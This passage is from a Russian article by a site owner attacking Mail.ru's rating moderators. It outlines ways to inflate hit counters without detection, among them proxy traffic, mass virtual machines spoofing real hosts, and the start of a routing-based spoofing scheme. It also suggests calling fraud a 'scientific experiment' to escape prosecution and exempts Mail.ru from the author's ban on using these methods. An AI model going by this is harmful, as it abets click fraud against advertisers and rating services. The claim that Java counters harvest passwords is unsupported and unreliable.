Но, что ни контакт с Mail.ru, &lt;BR&gt;то либо оскорбление, либо на грани этого. Задержка ответа более чем &lt;BR&gt;на сутки вкупе с отсутствием квитка может означать, что письмо, не &lt;BR&gt;прочитав, просто выбросили в корзину. Да и сам ответ оставляет &lt;BR&gt;желать лучшего, поскольку мне ставили в вину то, что в момент &lt;BR&gt;регистрации ресурса на Mail.ru (в то время еще List.ru) персонал &lt;BR&gt;Mail.ru мне не предложил код java-счетчика. В ответе я довел до &lt;BR&gt;сведения модератора свою трактовку кривой посещаемости и попросил &lt;BR&gt;выслать мне код необходимого java-счетчика. &lt;BR&gt;Второй ответ был не менее неубедительный - &quot;я так считаю&quot; и &lt;BR&gt;&quot;поставьте java-счетчик&quot;. Только после нескольких просьб мне выслали &lt;BR&gt;код счетчика, но так и не восстановили статус ресурса. Модераторы &lt;BR&gt;Mail.ru проявляли странное упорство. Тогда я звоню по указанному в &lt;BR&gt;одном из писем телефону и мне наглым тоном заявляют: &quot;А что Вы &lt;BR&gt;хотите? Счетчик бесплатный, имеем полное право&quot;. &lt;BR&gt;И тогда я понял, что это не глупость и не ошибка, а вымогательство &lt;BR&gt;денег из персонала ресурса с высоким рейтингом (мол, рейтинг &lt;BR&gt;высокий, а счетчик бесплатный, но если заплатите, то проблем не &lt;BR&gt;будет). Слово, объясняющее корыстный мотив совершенного действия, &lt;BR&gt;было сказано. А слово - не воробей, вылетело - не поймаешь. И &lt;BR&gt;некоторые уважаемые мной люди успели увидеть публичное обвинение &lt;BR&gt;меня в мошенничестве и высказали мне свое недоумение по этому &lt;BR&gt;поводу. И я был вынужден давать им объяснения и показывать переписку &lt;BR&gt;с Mail.ru. &lt;BR&gt;И тогда я решил наказать Mail.ru. &quot;Ломать&quot; их - не ново, да и &lt;BR&gt;мальчишество это с уголовщиной. Обращаться в Суд - долгая песня, да &lt;BR&gt;и страницу они уже удалили. И не только ее, но и регистрационую &lt;BR&gt;запись ресурса, усугубив нанесенное мне оскорбление небрежением к &lt;BR&gt;моей воле. Я не кровожаден, мне пока достаточно апелляции к &lt;BR&gt;общественному мнению, чтобы попытаться в корне пресечь &quot;бесплатное&quot; &lt;BR&gt;оскорбление людей бескорыстно любящими деньги &quot;рейтингистами&quot; из &lt;BR&gt;Mail.ru, и сделать это так, чтобы впредь и другим неповадно было. &lt;BR&gt;Видит Бог, до этого момента я даже не задумывался о публикации моих &lt;BR&gt;изысков о &quot;накрутке&quot; счетчиков. &lt;BR&gt;Как это было на самом деле&lt;BR&gt;В апреле 2001 года я пришел в Проект. Мне поставили задачу вывести &lt;BR&gt;Проект на верхние строки рейтингов (желательно первое место и с &lt;BR&gt;большим отрывом), т.е. необходимо было добиться посещаемости порядка &lt;BR&gt;10-15 тысяч человек в сутки (50-100 тысяч показов страниц). Я считаю &lt;BR&gt;идею Проекта очень перспективной, жизнеспособной и полностью &lt;BR&gt;соответствующей поставленной задаче. Хорошей идее нужна лишь &lt;BR&gt;правильная реализация, как алмазу нужна огранка, чтобы он засверкал &lt;BR&gt;всеми цветами радуги. Дальнейшее поведение переработанного мной &lt;BR&gt;Проекта подтвердило мои предположения. &lt;BR&gt;В июне было принято решение о переводе проекта в стадию &lt;BR&gt;реорганизации с продолжением финансирования минимально необходимых &lt;BR&gt;для реорганизации работ и персонала. И я приступил к &quot;огранке&quot;. Для &lt;BR&gt;начала я изучил требования всех основных &quot;поисковиков&quot; и &lt;BR&gt;реорганизовал в соответствии с их требованиями представление &lt;BR&gt;информации, добившись почти максимальной релевантности для ключевых &lt;BR&gt;слов на страницах. Однако остались &quot;хвосты&quot; от первых разработчиков. &lt;BR&gt;Например, в Expires было указано, что страницы не будут меняться две &lt;BR&gt;тысячи лет. &lt;BR&gt;Несмотря на то, что Internet в целом - инерционная система, резкие &lt;BR&gt;скачки посещаемости отдельных ресурсов вполне допустимы и &lt;BR&gt;свидетельствуют о качественных изменениях (переходных процессах) в &lt;BR&gt;поведении. С 10 октября 2001 года и по 5 марта 2002 года Проект &lt;BR&gt;непрерывно набирал посещаемость до более чем 500 человек в сутки и &lt;BR&gt;только благодаря одному Yandex.ru. Более значительному росту &lt;BR&gt;посещаемости мешал низкий индекс цитирования. Остальные же &lt;BR&gt;&quot;поисковики&quot; просто взирали на &quot;памятник&quot;, воздвигнутый из Expires &lt;BR&gt;первыми разработчиками. &lt;BR&gt;И вот ночью 5 марта, через год (слава Богу не через 2000 лет) после &lt;BR&gt;регистрации ресурса на Rambler.ru, их робот наконец-то &quot;проснулся&quot;, &lt;BR&gt;перечитал ресурс и сразу же дал резкий скачок посещаемости. Эффект &lt;BR&gt;был сравнимый с эффектом от регистрации ранее &quot;раскрученного&quot; &lt;BR&gt;ресурса (что мной неоднократно фиксировалось). Как Rambler.ru и &lt;BR&gt;обещали, что они &quot;покрывают&quot; порядка 65% RuNet-а, так и оказалось на &lt;BR&gt;самом деле. Я никогда не верю саморекламе вроде &quot;Пресса о нас&quot; или &lt;BR&gt;&quot;А вот мы какие хорошие&quot;, но тут я должен отдать должное - &lt;BR&gt;Rambler.ru можно верить. &lt;BR&gt;Поскольку ресурс работал в отладочном режиме, то в конфигурации &lt;BR&gt;Apache стояло MaxRequеstsPerChild=1. Из-за этого ограничения в &lt;BR&gt;кривой посещаемости появился горизонтальный &quot;стол&quot;. До 5-го мая я &lt;BR&gt;занимался исследованием соответствия пропускной способности канала и &lt;BR&gt;производительности сервера с одновременной правкой кода Проекта. &lt;BR&gt;Когда же я убедился, что все нормально, то сделал &lt;BR&gt;MaxRequеstsPerChild=0. Так появился второй скачок. В скором времени &lt;BR&gt;я планирую выложить на сайте окончательную версию проекта, и это &lt;BR&gt;будет третий скачок. &lt;BR&gt;Все изложенное мной можно подтвердить, анализируя log-файлы ресурса, &lt;BR&gt;которые я готов предоставить. Культурный человек, знакомый с теорией &lt;BR&gt;и имеющий опыт обработки результатов экспериментов, если бы не смог &lt;BR&gt;сам объяснить поведение кривой посещаемости, попросил бы объяснений &lt;BR&gt;у автора, и только потом, взвесив все &quot;pro&quot; и &quot;contra&quot; и имея на &lt;BR&gt;руках неопровержимые доказательства, обвинял бы в мошенничестве. Так &lt;BR&gt;не было сделано и теперь я делаю вывод, что модераторы рейтингов &lt;BR&gt;Mail.ru не обладает достаточной этической, правовой, научной и &lt;BR&gt;технической культурой, следовательно - невежи и невежды. Становится &lt;BR&gt;объяснимой попытка вымогательства, ибо, чем выше культурный уровень &lt;BR&gt;человека, тем сложнее ему покуситься на преступление, и наоборот, &lt;BR&gt;чем ниже - тем проще. По этой причине в приличном обществе невежам и &lt;BR&gt;невеждам обычно указывают на дверь. &lt;BR&gt;DURA LEX, SED LEX&lt;BR&gt;Я категорически запрещаю использовать изложенные в статье &lt;BR&gt;недостатки законодательства, факты, идеи и методы, как для &lt;BR&gt;совершения преступных деяний против кого-либо, так и в &lt;BR&gt;конкурентной борьбе. &lt;BR&gt;&lt;BR&gt;Запрет не распространяется на действия, направленные против &lt;BR&gt;Mail.ru, до тех пор, пока Mail.ru не принесут публично извинение &lt;BR&gt;за нанесенное оскорбление и не будет восстановлен status quo &lt;BR&gt;счетчика. &lt;BR&gt;Предвосхищая возможные обвинения, я заявляю, что не пользовался и не &lt;BR&gt;пользуюсь &quot;накруткой&quot; счетчиков, не нарушаю Закон и стараюсь всегда &lt;BR&gt;следовать нормам этики. И этого же ожидаю от других. И всегда &lt;BR&gt;считаю, что каждый человек достоин уважения до тех пор, пока &lt;BR&gt;неопровержимо не доказано обратное. И как культурному человеку мне &lt;BR&gt;трудно преодолеть моральные барьеры и преднамеренно ущемить кого-то &lt;BR&gt;в правах или совершить преступление. Мне проще найти решение сложной &lt;BR&gt;задачи, ибо уровень моего интеллекта позволяет это делать. Это не &lt;BR&gt;самореклама. Хорошо знающие меня люди подтвердят мои слова. &lt;BR&gt;Чтобы не сталкиваться с неожиданностями, я предварительно рассмотрел &lt;BR&gt;практически все аспекты проблемы и наметил пути реализации &lt;BR&gt;поставленной задачи. Не скрою, &quot;накрутку&quot; я рассматривал как &lt;BR&gt;временно допустимое средство, которое могло помочь ресурсу быстрее &lt;BR&gt;подняться в рейтинге до уровня &quot;самораскрутки&quot; (верхние строки &lt;BR&gt;рейтинга), когда &quot;накрутка&quot; уже будет не нужна. Но, чтобы &lt;BR&gt;пользоваться &quot;накруткой&quot;, необходимо было выяснить юридические &lt;BR&gt;последствия от ее применения, а также кто может &quot;поймать за руку&quot; и &lt;BR&gt;как надо &quot;накручивать&quot; ресурс и не быть пойманным. &lt;BR&gt;Размышляя над смыслом &quot;накрутки&quot;, я пришел к формулировке, которую &lt;BR&gt;поместил в начало статьи. Поскольку в Уголовном Кодексе отсутствует &lt;BR&gt;специальная статья, посвященная &quot;накрутке&quot;, то ее следует &lt;BR&gt;рассматривать как обычное мошенничество. Поэтому, если во время &lt;BR&gt;&quot;накрутки&quot; счетчика ресурса рекламодателю не наносится материальный &lt;BR&gt;ущерб, то отсутствует законченный состав преступления в виде &lt;BR&gt;мошенничества. Если ущерб отсутствует, то можно смело утверждать, &lt;BR&gt;что проводится научный эксперимент, результаты которого возможно &lt;BR&gt;лягут в основу статьи (диссертации). Цель эксперимента может быть &lt;BR&gt;любой, от выяснения порога &quot;самораскрутки&quot;, до влияния Internet-а на &lt;BR&gt;урожайность кукурузы. Лишь бы заявляемая цель выглядела &lt;BR&gt;правдоподобно. &lt;BR&gt;Об этике говорить не приходится, и так все ясно. Радует уже то, что &lt;BR&gt;хотя бы удается избежать уголовного преследования. Российский &lt;BR&gt;законодатель заранее побеспокоился еще и о том, чтобы log-файлы, не &lt;BR&gt;говоря о результатах их обработки, нельзя было рассматривать в &lt;BR&gt;качестве доказательств вины (но не невиновности из-за действия &lt;BR&gt;принципа презумпции невиновности), благодаря логически неверным и &lt;BR&gt;действующим в настоящее время юридическим определениям понятия &lt;BR&gt;&quot;документ&quot;. &lt;BR&gt;В 1993 году меня попросили написать рецензию на проект закона &quot;Об &lt;BR&gt;информации, информатизации и защите информации&quot;. Для кардинального &lt;BR&gt;улучшения смысла Закона я предложил сделать всего две вещи, а &lt;BR&gt;именно: в начале текста закона дать логически точные и юридически &lt;BR&gt;правильные определения понятий &quot;документ&quot;, &quot;документированная &lt;BR&gt;информация&quot;, &quot;стоимость информации&quot;, &quot;несанкционированный доступ&quot; и &lt;BR&gt;др., и изъять из текста государственную поддержку информатизации &lt;BR&gt;из-за возможных злоупотреблений. В 1993 году я мог только &lt;BR&gt;предполагать, а теперь мы все знаем, сколько было пролито крови и &lt;BR&gt;какие финансовые потери понесла Россия из-за необоснованных &lt;BR&gt;таможенных льгот благотворительным организациям и фондам. Сравнение &lt;BR&gt;текстов проекта, рецензии и самого закона дает мне основание &lt;BR&gt;полагать, что мои предложения были учтены при подготовке &lt;BR&gt;окончательного варианта. Но во что превратились определения!!! &lt;BR&gt;Думаю, что комментарии будут излишни, если сравнить текст закона и &lt;BR&gt;данное мной в рецензии возможное определение: документ - носитель &lt;BR&gt;информации (объект материального мира), путем изменения физических, &lt;BR&gt;химических, механических или иных материальных свойств которого, &lt;BR&gt;закодирована информация методом кодирования, позволяющим дать &lt;BR&gt;однозначный ответ на вопрос: изменялась или нет информация на этом &lt;BR&gt;носителе в течении заранее обусловленного времени. Много позже, в &lt;BR&gt;1999 году в статье &quot;Возможен неблагоприятный диагноз&quot; я дал &lt;BR&gt;обоснование и привел не претендующее на абсолютную точность, но &lt;BR&gt;интуитивно правильное объективное определение понятия &quot;информация&quot;, &lt;BR&gt;отличное от ныне действующего субъективного (информация - это &lt;BR&gt;сведения...). &lt;BR&gt;Итак, если Вы по собственной воле разместили ссылку на свой ресурс в &lt;BR&gt;публичном списке участников рейтинга, и если эту ссылку помимо Вашей &lt;BR&gt;воли и не по решению Суда персонал рейтинговой системы удалил из &lt;BR&gt;этого списка, стоит сразу же требовать принесения Вам публичных &lt;BR&gt;извинений и восстановления ссылки в списке вплоть до подачи иска в &lt;BR&gt;Суд. Никакие внутренние правила (регламенты) рейтинговых систем не &lt;BR&gt;могут оправдать публично уничижающее Вас самоуправство (нарушение &lt;BR&gt;воли) и, тем более, публичное распространение порочащих Вас &lt;BR&gt;измышлений (обвинение в мошенничестве без решения Суда). И не стоит &lt;BR&gt;соглашаться с ничтожностью нанесенного Вам морального вреда, &lt;BR&gt;поскольку сам по себе сделанный в лицо плевок ничтожен (достаточно &lt;BR&gt;просто вытереться), но моральный вред от содеянного публично &lt;BR&gt;несоизмеримо огромен (вплоть до инфаркта или суицида). И обиходный &lt;BR&gt;смысл понятия &quot;накрутки&quot; тождественен обиходному понятию &lt;BR&gt;мошенничества. &lt;BR&gt;Однако вернемся к &quot;накрутке&quot;. Остался нерешенным вопрос о том, какая &lt;BR&gt;из рейтинговых систем реально может &quot;поймать за руку&quot;. В мае 2001 &lt;BR&gt;года я написал perl-скрипт, который имитируя работу броузера MS &lt;BR&gt;Internet Explorer читал указанные страницы и все ссылки первого &lt;BR&gt;уровня через публичные proxy, список которых регулярно публикуется &lt;BR&gt;Yahoo.com. Сразу оговорюсь, что этот скрипт уже уничтожен и это была &lt;BR&gt;разовая акция, которая легко отслеживается, и целью которой была не &lt;BR&gt;&quot;накрутка&quot;, а выяснение качества работы различных рейтинговых &lt;BR&gt;систем. В результате было выяснено, что Rambler.ru и SpyLog.ru &lt;BR&gt;&quot;молча&quot; отбрасывают дискредитированные адреса &quot;на лету&quot;, в то время &lt;BR&gt;как Mail.ru воспринимает дискредитированные адреса как &quot;честные&quot;. &lt;BR&gt;Посещаемость ресурса по статистике Mail.ru выросла в тот день в два &lt;BR&gt;раза. Мне очень понравился профессионально грамотный подхода &lt;BR&gt;Rambler.ru и SpyLog.ru к дискредитированным адресам и тогда же я &lt;BR&gt;впервые столкнулся с непрофессионализмом персонала Mail.ru. &lt;BR&gt;Теперь стоит сказать несколько слов о java-счетчике. Сам по себе код &lt;BR&gt;java-счетчика дает прибавку к трафику размером 1-2 Кбайт для каждой &lt;BR&gt;страницы. При показе сайтом порядка 10 тысяч страниц в сутки общая &lt;BR&gt;прибавка составляет 10-20 Мбайт. В месяц это составит 300-600 Мбайт. &lt;BR&gt;За это приходится платить порядка 15-30 долларов США. И за это же &lt;BR&gt;приходится платить пользователям. А эта прибавка составляет порядка &lt;BR&gt;10 процентов от всего трафика пользователя. Итак, применение &lt;BR&gt;Java-счетчиков приводит к увеличению финансовых затрат всех &lt;BR&gt;участников Internet-а минимум на 10 процентов. А раз мы платим &lt;BR&gt;деньги, то нам надо знать, за что же мы их на самом деле платим. &lt;BR&gt;Java-счетчик передает такую информацию о компьютере пользователя &lt;BR&gt;третьему лицу (модератору рейтинга), которую невозможно получить в &lt;BR&gt;рамках стандарта HTTP. По этой информации модератор рейтинга может &lt;BR&gt;узнать, откуда был осуществлен переход на страницу, какой сервиспак &lt;BR&gt;установлен на компьютере, пароли и многое другое. Так нарушается &lt;BR&gt;конфиденциальность сведений о лице и это может быть расценено, либо &lt;BR&gt;как перлюстрация корреспонденции без решения Суда, либо как &lt;BR&gt;получение несанкционированного доступа к компьютеру пользователя. &lt;BR&gt;Т.е., самоуправство, граничащее с уголовно наказемыми деяниями, &lt;BR&gt;нарушающими права людей. Получается, что все мы платим деньги за то, &lt;BR&gt;что нарушаются наши права. &lt;BR&gt;И в качестве одного из обоснований правомерности применения &lt;BR&gt;java-счетчика приводится запрет в регламенте на посещение &lt;BR&gt;участвующего в рейтинге ресурса со страниц порно-сайтов. Если Вы, &lt;BR&gt;находясь в туалете или в публичном доме, нашли информацию о давно &lt;BR&gt;разыскиваемом Вами товаре и месте его продажи, пришли в этот магазин &lt;BR&gt;и купили товар, то это Ваше личное дело и никто не в праве осуждать &lt;BR&gt;Вас за это. И это личное дело продавца, где ему размещать информацию &lt;BR&gt;о своем товаре, ибо это он сам выбирает наиболее эффективное с его &lt;BR&gt;точки зрения место размещения рекламы своего товара. И запрет на &lt;BR&gt;размещение рекламы (информации) следует рассматривать, как цензуру, &lt;BR&gt;которая запрещена Конституцией. А если некий &quot;цензор на общественных &lt;BR&gt;началах&quot; встанет перед магазином, размещающим свою рекламу в &lt;BR&gt;туалетах и публичных домах и начнет кричать, что все покупатели &lt;BR&gt;этого магазина засранцы и прелюбодеи, то его можно и в милицию &lt;BR&gt;определить суток на 15 за мелкое хулиганство. Или морду набить. Это &lt;BR&gt;кому из них как повезет. &lt;BR&gt;И сразу все становится понятно, надо только выстроить правильную &lt;BR&gt;аналогию в привычной нам сфере. Вот, в качестве примера, фраза из &lt;BR&gt;одного закона: &quot;перед использованием средство защиты информации &lt;BR&gt;должно быть сертифицировано ФАПСИ&quot;. Давайте заменим слова и обороты &lt;BR&gt;их синонимами: &quot;средство защиты информации&quot; на &quot;сейф&quot; (от &lt;BR&gt;английского safe - сохранять, защищать), &quot;сертифицировано&quot; на &lt;BR&gt;&quot;исследовано&quot; (сертификация - исследование образца на соответствие &lt;BR&gt;предъявляемым требованиям) и &quot;ФАПСИ&quot; на &quot;постороннее лицо&quot; (вряд ли &lt;BR&gt;ФАПСИ является подразделением Вашего предприятия). Получается &quot;перед &lt;BR&gt;использованием сейф должен быть исследован посторонним лицом&quot;. Не &lt;BR&gt;знаю как Вы, а лично я такому &quot;сейфу&quot; не доверю даже использованные &lt;BR&gt;презервативы. &lt;BR&gt;И последний вопрос, как технически организовать &quot;накрутку&quot; так, &lt;BR&gt;чтобы высоко профессиональные команды не смогли бы отличить работу &lt;BR&gt;виртуальных машин от реальных. Поиск в Internet-е компьютеров с ОС &lt;BR&gt;Windows, затем их &quot;взлом&quot; и внедрение в систему кода для &quot;накрутки&quot; &lt;BR&gt;счетчиков отметаю сразу, как явную уголовщину, которая подпадает под &lt;BR&gt;действие сразу всех &quot;компьютерных&quot; статей УК. А милиции стоит &lt;BR&gt;задуматься о поимке мошенников, которые пользуются такой &lt;BR&gt;&quot;накруткой&quot;, ибо этот вид мошенничества, по определению, входит в &lt;BR&gt;компетенцию подразделений по борьбе с преступлениями в сфере высоких &lt;BR&gt;технологий. &lt;BR&gt;Остается единственный вариант, учитывая особенности протокола &lt;BR&gt;TCP/IP, создать на некотором компьютере (лучше - на нескольких) &lt;BR&gt;систему виртуальных машин, максимально точно имитирующую в &lt;BR&gt;необходимом для &quot;накрутки&quot; объеме работу реальных машин с ОС Windows &lt;BR&gt;и различными броузерами из реального адресного пространства &lt;BR&gt;Internet. Это сродни использованию публичных proxy, (их немного в &lt;BR&gt;Internet-е и они прекрасно отслеживаются). Но, в отличии от proxy, &lt;BR&gt;виртуальные машины, учитывающие особенности протокола TCP/IP, крайне &lt;BR&gt;сложно выявлять и их можно сгенерировать на одном компьютере &lt;BR&gt;несколько миллионов. И никакие java-счетчики или IPv6 не помогут их &lt;BR&gt;отсеять. А если еще учесть особенности ныне действующего Российского &lt;BR&gt;законодательства, то работу с такими машинами можно организовать &lt;BR&gt;так, что предъявить обвинение в мошенничестве будет практически &lt;BR&gt;невозможно. Другие варианты &quot;накрутки&quot; либо не дают должного &lt;BR&gt;эффекта, либо легко выявляются и нейтрализуются. &lt;BR&gt;Дорога в Ад&lt;BR&gt;В правительстве США есть департамент DoD, который курирует научные &lt;BR&gt;разработки в военной области. В недрах DoD родился проект военных &lt;BR&gt;сетей передачи данных ARPA. Для применения в военной сфере &lt;BR&gt;разработка получилась на редкость удачной. Потом, ничтоже сумняшеся, &lt;BR&gt;эту разработку чуть-чуть подправили и применили в гражданской сфере &lt;BR&gt;под именем TCP/IP. Сделано это было из благих намерений: зачем &lt;BR&gt;тратить лишние деньги на разработку чего-то нового, когда вот оно &lt;BR&gt;готовое решение - бери и применяй. И применили. Правда, сплошной мед &lt;BR&gt;иногда отдавал привкусом дегтя, вроде червя Морриса-младшего, &lt;BR&gt;Мелиссы, атаки Митника или DNS-шторма. Но это все были первые &lt;BR&gt;звоночки, ибо авторы принятого решения не учли (или не знали), что &lt;BR&gt;дорога в Ад вымощена благими намерениями. &lt;BR&gt;Задачи, решаемые сетями передачи данных в условиях войны, &lt;BR&gt;кардинально отличаются от задач мирного времени. На войне, если &lt;BR&gt;подразделение (компьютер) будет срочно и скрытно передислоцировано в &lt;BR&gt;другое место, то после марша подразделение должно быть &lt;BR&gt;незамедлительно развернуто в боевой порядок и наладить &lt;BR&gt;взаимодействие с остальными силами. Для этого бывает достаточно &lt;BR&gt;связаться (модем и телефонная линия) с ближайшим подразделением &lt;BR&gt;фельдсвязи (провайдер) и указать старый или получить новый номер &lt;BR&gt;полевой почты (IP-адрес) войсковой части. Изменение пути доставки &lt;BR&gt;приказов к этому подразделению (информации) должно происходить &lt;BR&gt;просто и незаметно для всей остальной системы (Internet) военной &lt;BR&gt;связи. И всегда должны существовать резервные пути доставки приказов &lt;BR&gt;(каналы связи и модемные пулы других провайдеров). И не важно, по &lt;BR&gt;какому пути доставлен приказ, важно доставить его максимально быстро &lt;BR&gt;и важно, что приказу можно доверять, поскольку маршрут проходил по &lt;BR&gt;своей территории (сеть провайдера, Ru.Net, Internet) и почтальоны &lt;BR&gt;всегда были свои. Поэтому, как процедуры доставки (роутинг), так и &lt;BR&gt;сами приказы (IP-пакеты) имеют простою форму, достаточную для &lt;BR&gt;быстрой проверки достоверности по простым формальным признакам. А &lt;BR&gt;если будет уничтожен батальон (отключен компьютер), то ни полк (сеть &lt;BR&gt;провайдера), ни дивизия (Ru.Net), ни армия (Internet) из-за это не &lt;BR&gt;должны быть дезорганизованы. Ибо, в армии потеря части не должна &lt;BR&gt;приводить к потери целого. Иногда частью даже жертвуют во имя &lt;BR&gt;спасения целого. Ебинообразие - основная черта любой армии. И все ее &lt;BR&gt;части структурно просты, ибо для воссоздания структурно простой &lt;BR&gt;конструкции (масштабирование) нужны небольшие затраты. И увеличение &lt;BR&gt;численности армии происходит заполнением мобилизованными &lt;BR&gt;резервистами предварительно развернутых кадрированных частей, &lt;BR&gt;полностью укомплектованные вооружением и техникой. &lt;BR&gt;В мирной жизни все иначе. Нас много и все мы разные. И каждый из нас &lt;BR&gt;индивидуален. Цель мирной жизни - развитие общества, а это &lt;BR&gt;невозможно, если все члены общества будут одинаково простые. Надо &lt;BR&gt;чтобы все мы были по разному сложные. И это различие является &lt;BR&gt;основной ценностью общества. И все индивидуальности объединяет в &lt;BR&gt;единое целое статичная инфраструктура. А это и &lt;BR&gt;водо-газо-электро-снабжение, и канализация, и милиция, и почта, и &lt;BR&gt;школа, и детский сад, и дороги, и магазины, и дома и многое-многое &lt;BR&gt;другое. И существенные изменения инфраструктуры сродни революциям и &lt;BR&gt;очень болезненно воспринимается всеми, ибо рушатся устойчивые связи. &lt;BR&gt;И потеря одного члена общества сказывается на всех. И это &lt;BR&gt;невосполнимая потеря, ибо может привести к изменению пути развития &lt;BR&gt;всего общества. И на формирование каждого своего члена общество &lt;BR&gt;затрачивает большие ресурсы, ибо заранее невозможно сказать, кто &lt;BR&gt;привнесет больший вклад в развитие общества, а кто меньший. И &lt;BR&gt;невозможно сразу определить, кто является вором, а кто честным &lt;BR&gt;человеком, поэтому априори предполагается, что все люди - честные, &lt;BR&gt;но кошелек лучше держать всегда подальше. И в мирной жизни иногда &lt;BR&gt;случается, что почта приходит не тому адресату и это допустимо, ибо &lt;BR&gt;в мирной жизни мы не привыкли слишком доверять необычному. &lt;BR&gt;Армия лишь небольшая часть общества, существующая только для защиты &lt;BR&gt;общества и предназначена для ведения боевых действий. И не может &lt;BR&gt;заменить собой само общество. Иначе - война. И чем дольше армия не &lt;BR&gt;участвует в боевых действиях, тем сложнее структурно она становится, &lt;BR&gt;тем больше в ней накапливается различных проявлений мирной жизни. И &lt;BR&gt;этот процесс усложнения называется разложением армии. И армия &lt;BR&gt;борется с разложением. Единственный эффективный путь борьбы - война. &lt;BR&gt;Недаром США после 1945 года постоянно участвовали в региональных &lt;BR&gt;конфликтах (Корея, Куба, Вьетнам, Камбоджа, Ирак, Косово, &lt;BR&gt;Афганистан). Война все списывает и можно кого-то убить или послать &lt;BR&gt;на смерть и ничего за это не будет, особенно если есть широкие &lt;BR&gt;лампасы. И в армии начинают превалировать структурно простые, вроде &lt;BR&gt;хамоватых и невежественных &quot;генерал-модераторов&quot; от Mail.ru. &lt;BR&gt;Простота армии эффективна только тогда, когда есть четкая линия &lt;BR&gt;фронта, с одной стороны которой - соратники, а с другой - &lt;BR&gt;противники. И армия всегда проигрывает в борьбе с партизанами, когда &lt;BR&gt;нет четкой границы между соратниками и противниками. Будь то во &lt;BR&gt;время Великой Отечественной Войны, во Вьетнаме, в Афганистане, в &lt;BR&gt;Косово или в Чечне. И только создание сложной инфраструктуры мирной &lt;BR&gt;жизни делает возможным прекращение партизанской войны. Но это уже не &lt;BR&gt;война и не в этом состоит задача армии. И простота армии в сложной &lt;BR&gt;ситуации играет с ней злую шутку. В начале Чеченской кампании &lt;BR&gt;Российская армия пользовалась для связи между подразделениями &lt;BR&gt;широковещательными каналами радиосвязи. Во время артобстрелов &lt;BR&gt;чеченские боевики, маскируясь в каналах радиосвязи под подразделения &lt;BR&gt;Российской армии, корректировали огонь так, что обстрелу &lt;BR&gt;подвергались подразделения Российской армии. И армия сама себя &lt;BR&gt;уничтожала. &lt;BR&gt;Неисповедимы пути пакетов&lt;BR&gt;Я не буду рассматривать все возможные методы обмана в сети Internet. &lt;BR&gt;Я и так уже сказал и еще скажу достаточно, чтобы умный человек смог &lt;BR&gt;сам дальше развить мои мысли, а &quot;безбашенным&quot; все знать небезопасно &lt;BR&gt;прежде всего для самих себя. Я опишу лишь один единственный &lt;BR&gt;Чеченский вариант маскировки. Ибо, именно этот вариант наиболее &lt;BR&gt;пригоден для использования в &quot;накрутке&quot;, которую практически &lt;BR&gt;невозможно выявлять. И я не приведу ни одной строки кода, дабы меня &lt;BR&gt;не могли обвинить в написании вредоносных программ, и намеренно &lt;BR&gt;допущу некоторые умолчания и неточности, дабы меня не могли обвинить &lt;BR&gt;в подстрекательстве к мошенничеству. &lt;BR&gt;Рассмотрим процедуру роутинга, реализованную в протоколе TCP/IP. &lt;BR&gt;Предположим, что имеется некий компьютер (клиент), который пытается &lt;BR&gt;установить связь с другим компьютером (сервер). Клиент передает &lt;BR&gt;IP-пакет (датаграмму) ближайшему роутеру (хопу), который объявлен в &lt;BR&gt;таблицах роутинга клиента, как default. Дальше датаграмма передается &lt;BR&gt;от хопа к хопу до достижения конечной точки маршрута или исчерпания &lt;BR&gt;счетчика хопов пакета. Если по таблице роутинга хопа невозможно &lt;BR&gt;определить, какой ближайший хоп знает куда направить пакет дальше, &lt;BR&gt;то он направляется default router-у этого хопа. Заметим одну &lt;BR&gt;особенность такой процедуры роутинга: она справедлива для любых &lt;BR&gt;адресов источников и приемников датаграмм и любой хоп по умолчанию &lt;BR&gt;знает свойства только ближайших хопов. Internet - глобальная сеть и &lt;BR&gt;в ней постоянно что-то происходит. То компьютеры включаются, то &lt;BR&gt;выключаются, то отваливаются каналы, то появляются новые. В общем, &lt;BR&gt;сеть &quot;живет&quot; и поведение какой-то части сети не должно мешать &lt;BR&gt;доставке пакетов других ее частей. И если какой-то хоп вышел из &lt;BR&gt;строя, то его тут же готовы заменить несколько ближайших хопов, &lt;BR&gt;создав обходной маршрут движения датаграмм. Так достигается &lt;BR&gt;высочайшая надежность доставки пакетов, и, следовательно, всей сети &lt;BR&gt;как средства доставки информации от одного компьютера к другому. И &lt;BR&gt;именно это свойство используется для Чеченской маскировки при &lt;BR&gt;&quot;накрутке&quot; счетчиков. &lt;BR&gt;Мне могут возразить, что есть протокол TCP из стека протоколов IP и &lt;BR&gt;он устанавливает статичный маршрут доставки датаграмм, как от &lt;BR&gt;клиента к серверу, так и в обратном направлении. Да, это так, но с &lt;BR&gt;несколькими оговорками. Во первых, процедура поиска маршрута &lt;BR&gt;используется та же, что и для доставки простых датаграмм. Во вторых, &lt;BR&gt;адрес следующего хопа для доставки пакетов в рамках соединения &lt;BR&gt;хранится динамически, и только до тех пор, пока соединение не будет &lt;BR&gt;закрыто. В третьих, такой маршрут не попадает в таблицы &lt;BR&gt;маршрутизации и становится невидимым для других соединений. Иногда &lt;BR&gt;встречается неполная реализация процедуры маршрутизации соединений, &lt;BR&gt;когда маршруты временно размещаются в таблицах роутинга, тогда это &lt;BR&gt;свойство можно использовать для прослушивания трафика от &lt;BR&gt;интересующего компьютера. &lt;BR&gt;Статически прописывать маршруты для каждого хопа - задача физически &lt;BR&gt;нереализуемая, особенно для больших сетей. Для снижения затрат при &lt;BR&gt;прописывании маршрутов был придуман RIP. Но, при использовании RIP &lt;BR&gt;или его расширений (BGP, EGRP и др.) возрастает опасность &lt;BR&gt;блокирования работы сети на неопределенное время, когда объем &lt;BR&gt;служебного трафика начнет существенно превышать объем полезного. Вы &lt;BR&gt;можете провести поучительный эксперимент, если у Вас под руками &lt;BR&gt;имеется разнородная сеть с &quot;излишне умными&quot; маршрутизаторами &lt;BR&gt;(порядка сотни компьютеров, порядка десяти роутеров CISCO, часть &lt;BR&gt;которых соединена треугольником каналами связи с различной &lt;BR&gt;пропускной способностью). Однажды, настраивая компьютер с HPUX в &lt;BR&gt;одной организации с такой сетью, я не отключил на этой машине &lt;BR&gt;DHCP-сервер и в конце RC-файла вставил команду reboot. Не помню уже, &lt;BR&gt;но для чего-то мне это было нужно. И сеть встала. Скорость передачи &lt;BR&gt;ftp-данных в 100 мегабитном сегменте сети стала что-то порядка &lt;BR&gt;1.5-1.9 Кбайт/сек, хотя нормальная была 9-11 Мбайт/сек. Замерил &lt;BR&gt;объем служебного трафика - 99 процентов. При выключении HPUX или &lt;BR&gt;замене CISCO на простые HUB-ы работа сети восстанавливалась. &lt;BR&gt;Пусть в сети имеются три компьютера: A (атакующий), B (имитируемый), &lt;BR&gt;C (счетчик) и пусть в сети имеются два 